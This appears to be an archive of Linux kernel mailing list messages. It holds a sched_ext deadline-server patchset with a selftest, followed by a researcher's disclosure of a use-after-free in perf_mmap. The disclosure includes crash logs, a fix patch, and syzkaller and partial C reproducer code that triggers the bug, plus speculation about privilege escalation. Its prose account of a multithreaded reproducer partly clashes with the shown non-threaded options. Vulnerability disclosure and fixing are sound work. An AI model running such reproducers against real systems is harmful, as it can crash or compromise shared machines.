Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
|
From: Joel Fernandes <joelagnelf@nvidia.com>
Add a new kselftest to verify that the total_bw value in
/sys/kernel/debug/sched/debug remains consistent across all CPUs
under different sched_ext BPF program states:
1. Before a BPF scheduler is loaded
2. While a BPF scheduler is loaded and active
3. After a BPF scheduler is unloaded
The test runs CPU stress threads to ensure DL server bandwidth
values stabilize before checking consistency. This helps catch
potential issues with DL server bandwidth accounting during
sched_ext transitions.
Tested-by: Christian Loehle <christian.loehle@arm.com>
Co-developed-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
---
tools/testing/selftests/sched_ext/Makefile | 1 +
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++
2 files changed, 282 insertions(+)
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
diff --git a/tools/testing/selftests/sched_ext/Makefile b/tools/testing/selftests/sched_ext/Makefile
index c9255d1499b6e..2c601a7eaff5f 100644
--- a/tools/testing/selftests/sched_ext/Makefile
+++ b/tools/testing/selftests/sched_ext/Makefile
@@ -185,6 +185,7 @@ auto-test-targets := \
select_cpu_vtime \
rt_stall \
test_example \
+ total_bw \
testcase-targets := $(addsuffix .o,$(addprefix $(SCXOBJ_DIR)/,$(auto-test-targets)))
diff --git a/tools/testing/selftests/sched_ext/total_bw.c b/tools/testing/selftests/sched_ext/total_bw.c
new file mode 100644
index 0000000000000..5b0a619bab86e
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/total_bw.c
@@ -0,0 +1,281 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Test to verify that total_bw value remains consistent across all CPUs
+ * in different BPF program states.
+ *
+ * Copyright (C) 2025 NVIDIA Corporation.
+ */
+#include <bpf/bpf.h>
+#include <errno.h>
+#include <pthread.h>
+#include <scx/common.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "minimal.bpf.skel.h"
+#include "scx_test.h"
+
+#define MAX_CPUS 512
+#define STRESS_DURATION_SEC 5
+
+struct total_bw_ctx {
+ struct minimal *skel;
+ long baseline_bw[MAX_CPUS];
+ int nr_cpus;
+};
+
+static void *cpu_stress_thread(void *arg)
+{
+ volatile int i;
+ time_t end_time = time(NULL) + STRESS_DURATION_SEC;
+
+ while (time(NULL) < end_time)
+ for (i = 0; i < 1000000; i++)
+ ;
+
+ return NULL;
+}
+
+/*
+ * The first enqueue on a CPU starts that CPU's DL server, so run one
+ * stressor thread per CPU in the hope that they get spread across all CPUs.
+ */
+static int run_cpu_stress(int nr_cpus)
+{
+ pthread_t *threads;
+ int i, ret = 0;
+
+ threads = calloc(nr_cpus, sizeof(pthread_t));
+ if (!threads)
+ return -ENOMEM;
+
+ /* Create threads to run on each CPU */
+ for (i = 0; i < nr_cpus; i++) {
+ if (pthread_create(&threads[i], NULL, cpu_stress_thread, NULL)) {
+ ret = -errno;
+ fprintf(stderr, "Failed to create thread %d: %s\n", i, strerror(-ret));
+ break;
+ }
+ }
+
+ /* Wait for all threads to complete */
+ for (i = 0; i < nr_cpus; i++) {
+ if (threads[i])
+ pthread_join(threads[i], NULL);
+ }
+
+ free(threads);
+ return ret;
+}
+
+static int read_total_bw_values(long *bw_values, int max_cpus)
+{
+ FILE *fp;
+ char line[256];
+ int cpu_count = 0;
+
+ fp = fopen("/sys/kernel/debug/sched/debug", "r");
+ if (!fp) {
+ SCX_ERR("Failed to open debug file");
+ return -1;
+ }
+
+ while (fgets(line, sizeof(line), fp)) {
+ char *bw_str = strstr(line, "total_bw");
+
+ if (bw_str) {
+ bw_str = strchr(bw_str, ':');
+ if (bw_str) {
+ /* Only store up to max_cpus values */
+ if (cpu_count < max_cpus)
+ bw_values[cpu_count] = atol(bw_str + 1);
+ cpu_count++;
+ }
+ }
+ }
+
+ fclose(fp);
+ return cpu_count;
+}
+
+static bool verify_total_bw_consistency(long *bw_values, int count)
+{
+ int i;
+ long first_value;
+
+ if (count <= 0)
+ return false;
+
+ first_value = bw_values[0];
+
+ for (i = 1; i < count; i++) {
+ if (bw_values[i] != first_value) {
+ SCX_ERR("Inconsistent total_bw: CPU0=%ld, CPU%d=%ld",
+ first_value, i, bw_values[i]);
+ return false;
+ }
+ }
+
+ return true;
+}
+
+static int fetch_verify_total_bw(long *bw_values, int nr_cpus)
+{
+ int attempts = 0;
+ int max_attempts = 10;
+ int count;
+
+	/* Run stressor threads so the DL servers on all CPUs get started. */
+ if (run_cpu_stress(nr_cpus) < 0) {
+ SCX_ERR("Failed to run CPU stress");
+ return -1;
+ }
+
+ /* Try multiple times to get stable values */
+ while (attempts < max_attempts) {
+ count = read_total_bw_values(bw_values, nr_cpus);
+ fprintf(stderr, "Read %d total_bw values (testing %d CPUs)\n", count, nr_cpus);
+ /* If system has more CPUs than we're testing, that's OK */
+ if (count < nr_cpus) {
+ SCX_ERR("Expected at least %d CPUs, got %d", nr_cpus, count);
+ attempts++;
+ sleep(1);
+ continue;
+ }
+
+ /* Only verify the CPUs we're testing */
+ if (verify_total_bw_consistency(bw_values, nr_cpus)) {
+ fprintf(stderr, "Values are consistent: %ld\n", bw_values[0]);
+ return 0;
+ }
+
+ attempts++;
+ sleep(1);
+ }
+
+ return -1;
+}
+
+static enum scx_test_status setup(void **ctx)
+{
+ struct total_bw_ctx *test_ctx;
+
+ if (access("/sys/kernel/debug/sched/debug", R_OK) != 0) {
+ fprintf(stderr, "Skipping test: debugfs sched/debug not accessible\n");
+ return SCX_TEST_SKIP;
+ }
+
+ test_ctx = calloc(1, sizeof(*test_ctx));
+ if (!test_ctx)
+ return SCX_TEST_FAIL;
+
+ test_ctx->nr_cpus = sysconf(_SC_NPROCESSORS_ONLN);
+ if (test_ctx->nr_cpus <= 0) {
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ /* If system has more CPUs than MAX_CPUS, just test the first MAX_CPUS */
+ if (test_ctx->nr_cpus > MAX_CPUS)
+ test_ctx->nr_cpus = MAX_CPUS;
+
+ /* Test scenario 1: BPF program not loaded */
+ /* Read and verify baseline total_bw before loading BPF program */
+ fprintf(stderr, "BPF prog initially not loaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(test_ctx->baseline_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable baseline values");
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ /* Load the BPF skeleton */
+ test_ctx->skel = minimal__open();
+ if (!test_ctx->skel) {
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ SCX_ENUM_INIT(test_ctx->skel);
+ if (minimal__load(test_ctx->skel)) {
+ minimal__destroy(test_ctx->skel);
+ free(test_ctx);
+ return SCX_TEST_FAIL;
+ }
+
+ *ctx = test_ctx;
+ return SCX_TEST_PASS;
+}
+
+static enum scx_test_status run(void *ctx)
+{
+ struct total_bw_ctx *test_ctx = ctx;
+ struct bpf_link *link;
+ long loaded_bw[MAX_CPUS];
+ long unloaded_bw[MAX_CPUS];
+ int i;
+
+ /* Test scenario 2: BPF program loaded */
+ link = bpf_map__attach_struct_ops(test_ctx->skel->maps.minimal_ops);
+ if (!link) {
+ SCX_ERR("Failed to attach scheduler");
+ return SCX_TEST_FAIL;
+ }
+
+ fprintf(stderr, "BPF program loaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(loaded_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable values with BPF loaded");
+ bpf_link__destroy(link);
+ return SCX_TEST_FAIL;
+ }
+ bpf_link__destroy(link);
+
+ /* Test scenario 3: BPF program unloaded */
+ fprintf(stderr, "BPF program unloaded, reading total_bw values\n");
+ if (fetch_verify_total_bw(unloaded_bw, test_ctx->nr_cpus) < 0) {
+ SCX_ERR("Failed to get stable values after BPF unload");
+ return SCX_TEST_FAIL;
+ }
+
+ /* Verify all three scenarios have the same total_bw values */
+ for (i = 0; i < test_ctx->nr_cpus; i++) {
+ if (test_ctx->baseline_bw[i] != loaded_bw[i]) {
+ SCX_ERR("CPU%d: baseline_bw=%ld != loaded_bw=%ld",
+ i, test_ctx->baseline_bw[i], loaded_bw[i]);
+ return SCX_TEST_FAIL;
+ }
+
+ if (test_ctx->baseline_bw[i] != unloaded_bw[i]) {
+ SCX_ERR("CPU%d: baseline_bw=%ld != unloaded_bw=%ld",
+ i, test_ctx->baseline_bw[i], unloaded_bw[i]);
+ return SCX_TEST_FAIL;
+ }
+ }
+
+ fprintf(stderr, "All total_bw values are consistent across all scenarios\n");
+ return SCX_TEST_PASS;
+}
+
+static void cleanup(void *ctx)
+{
+ struct total_bw_ctx *test_ctx = ctx;
+
+ if (test_ctx) {
+ if (test_ctx->skel)
+ minimal__destroy(test_ctx->skel);
+ free(test_ctx);
+ }
+}
+
+struct scx_test total_bw = {
+ .name = "total_bw",
+ .description = "Verify total_bw consistency across BPF program states",
+ .setup = setup,
+ .run = run,
+ .cleanup = cleanup,
+};
+REGISTER_SCX_TEST(&total_bw)
--
2.52.0
|
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:05 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
|
Hello,
On Mon, Jan 26, 2026 at 10:58:58AM +0100, Andrea Righi wrote:
Peter, Ingo, this patchset has been around the block for a long time and the
remaining deadline and debug patches are reviewed and seem fairly isolated.
Given that the patchset addresses an on-going issue, I'd prefer to land the
series before the merge window. If you want to route 1-3 (or the whole
series) through sched/core, please let me know. Otherwise, I can route them
through the sched_ext tree.
Thanks.
--
tejun
|
{
"author": "Tejun Heo <tj@kernel.org>",
"date": "Mon, 2 Feb 2026 06:45:29 -1000",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
